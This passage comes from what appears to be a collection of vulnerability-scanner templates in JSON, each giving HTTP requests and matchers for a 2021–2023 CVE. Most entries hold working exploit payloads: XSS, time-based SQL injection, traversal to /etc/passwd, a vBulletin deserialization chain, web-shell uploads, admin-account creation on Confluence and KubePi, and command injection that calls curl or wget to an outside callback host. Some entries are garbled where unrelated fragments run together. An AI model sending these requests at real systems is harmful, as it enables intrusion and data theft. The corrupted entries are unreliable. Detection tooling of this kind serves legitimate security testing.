Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0676","info":{"name":"phpIPAM 1.5.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{BaseURL}}/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator\n\nwsize=50000&delay=&fsize=1024\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Login successful\")","contains(body_2, \"\")","contains(content_type_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39108","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-0602","info":{"name":"Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains_all(body_2, \"\", \"twittee\")"],"condition":"and"}]}]},{"id":"CVE-2023-4974","info":{"name":"Academy LMS 6.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 500","contains(body, \"Courses\")"],"condition":"and"}]}]},{"id":"CVE-2023-1719","info":{"name":"Bitrix Component - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'LOG_CNT':",""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41599","info":{"name":"JFinalCMS v5.0.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30258","info":{"name":"MagnusBilling - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-4168","info":{"name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"google_map_key\", \"api_key\", \"auth_domain\")"],"condition":"and"}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-48777","info":{"name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax\n","GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_4)","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["admin\\\\\\/admin\\-ajax\\.php\",\"nonce\":\"([0-9a-z]+)\""]}]}]},{"id":"CVE-2023-43261","info":{"name":"Milesight Routers - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lang/log/httpd.log"],"max-size":5000,"extractors":[{"type":"regex","regex":["\"username\":\"([^\"]+)\",\"password\":\"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)\""]}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_5","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td>
    \")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-22463","info":{"name":"KubePi JwtSigKey - Admin Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /kubepi/api/v1/users HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n\n{\n \"authenticate\": {\n \"password\": \"{{password}}\"\n },\n \"email\": \"{{email}}\",\n \"isAdmin\": true,\n \"mfa\": {\n \"enable\": false\n },\n \"name\": \"{{name}}\",\n \"nickName\": \"{{nickname}}\",\n \"roles\": [\n ]\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"password\":","\"isAdmin\":","\"createAt\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47246","info":{"name":"SysAid Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}\n","@timeout: 15\nGET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"]}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6568","info":{"name":"Mlflow - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/2.0/mlflow/users/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: \n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Invalid content type:"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-29827","info":{"name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n\nfile_datafile_name`{}`.pptx'|\" |cat /etc/passwd||a #service_ppt2lp_size720x540\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-38203","info":{"name":"Adobe ColdFusion - Deserialization of Untrusted Data","severity":"critical"},"requests":[{"raw":["POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=
    {{jndi}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-4113","info":{"name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Select Service(s)\", \">\")"],"condition":"and"}]}]},{"id":"CVE-2023-39677","info":{"name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1","{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td>
    \")"],"condition":"and"}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to \")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-29625","info":{"name":"Adminer <=4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n\n\n
    ([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-22515","info":{"name":"Atlassian Confluence - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","@timeout:20s\nPOST /setup/setupadministrator.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nusername={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next\n","POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nos_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action\n","GET /welcome.action 